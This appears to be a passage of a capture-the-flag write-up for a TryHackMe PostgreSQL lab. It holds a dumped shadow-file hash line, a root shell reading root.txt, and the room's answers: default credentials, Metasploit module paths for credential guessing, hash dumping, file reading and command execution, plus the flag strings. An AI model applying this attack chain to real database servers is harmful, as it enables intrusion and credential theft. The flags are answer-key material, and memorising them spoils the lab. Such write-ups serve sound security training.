dark:$6$kaUxujtE$PsmWfi8X.4YCFygPwjDgzLwqxZX4OCEF4nWoG4o4LsLyvDsWiSnUvQCKqhjNqiKQiZ4wgNewvM/zgbjahb2ci1:18472:0:99999:7:::
root@ubuntu:/home/alison# cd /root/
root@ubuntu:~# ls -al
total 24
drwx------ 3 root root 4096 Jul 28 2020 .
drwxr-xr-x 22 root root 4096 Jul 28 2020 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4096 Jul 28 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 49 Jul 28 2020 root.txt
root@ubuntu:~# cat root.txt
THM{c0ngrats_for_read_the_f1le_w1th_credent1als}
Answer the questions below
What is the rdbms installed on the server?
PostgreSQL
What port is the rdbms running on?
5432
Metasploit contains a variety of modules that can be used to enumerate in multiple rdbms, making it easy to gather valuable information.
After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?
auxiliary/scanner/postgres/postgres_login
What are the credentials you found?
example: user:password
postgres:password
What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?
auxiliary/admin/postgres/postgres_sql
Based on the results of #6, what is the rdbms version installed on the server?
9.5.21
What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
auxiliary/scanner/postgres/postgres_hashdump
How many user hashes does the module dump?
6
What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
auxiliary/admin/postgres/postgres_readfile
What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?
exploit/multi/postgres/postgres_copy_from_program_cmd_exec
Compromise the machine and locate user.txt
THM{postgresql_fa1l_conf1gurat1on}
Escalate privileges and obtain root.txt
THM{c0ngrats_for_read_the_f1le_w1th_credent1als}